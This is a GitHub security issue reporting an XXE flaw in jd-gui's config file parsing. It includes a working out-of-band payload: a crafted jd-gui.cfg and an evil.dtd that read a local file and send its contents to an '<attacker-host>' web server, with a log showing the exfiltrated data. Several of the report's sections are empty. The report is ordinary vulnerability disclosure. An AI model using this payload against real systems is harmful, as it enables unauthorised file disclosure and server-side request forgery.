java-decompiler / jd-gui

A standalone Java Decompiler GUI
GNU General Public License v3.0
13.72k stars, 2.36k forks

[Security] - XXE leads to SSRF/File Disclosure #409

Open 3sjay opened 1 year ago

3sjay commented 1 year ago

XXE leads to SSRF/File Disclosure

This is not a critical security issue in my opinion as it is quite a contrived scenario. Just observed the behaviour and wanted to have it out of my mind.

The way the jd-gui.cfg file is parsed allows for SSRF or File Disclosure attacks due to the processing of XML external entities. The main issues are:

Attack idea

Place a jd-gui.cfg file within the file locations of .jars to trigger the vulnerability.

Attack Setup

Follow the outlined steps within the same dir:

  1. echo -n testcontent>test # file to be extracted
  2. Create the following jd-gui.cfg file:
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE data [
    <!ENTITY % file SYSTEM
    "file:///<path/to/current_working_dir>/test">
    <!ENTITY % dtd SYSTEM
    "http://<attacker-host>:8000/evil.dtd">
    %dtd;
    ]>
    <data>&send;</data>
  3. Replace the value <attacker-host> with your attacking host. Also replace the <path/to/current_working_dir> with your CWD.
  4. Create the evil.dtd file:
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://<attacker-host>:8000/?collect=%file;'>">
    %all;
  5. Replace the value <attacker-host> again to match your host machine
  6. Start python Webserver python3 -m http.server
  7. Last step, start jd-gui.jar, e.g. java -jar ~/Downloads/jd-gui.jar

Result:

esjay@machine jd-gui % python3 -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...
<snip> "GET /evil.dtd HTTP/1.1" 200 -
<snip> "GET /?collect=testcontent HTTP/1.1" 200 -

Some Notes:

Recommendations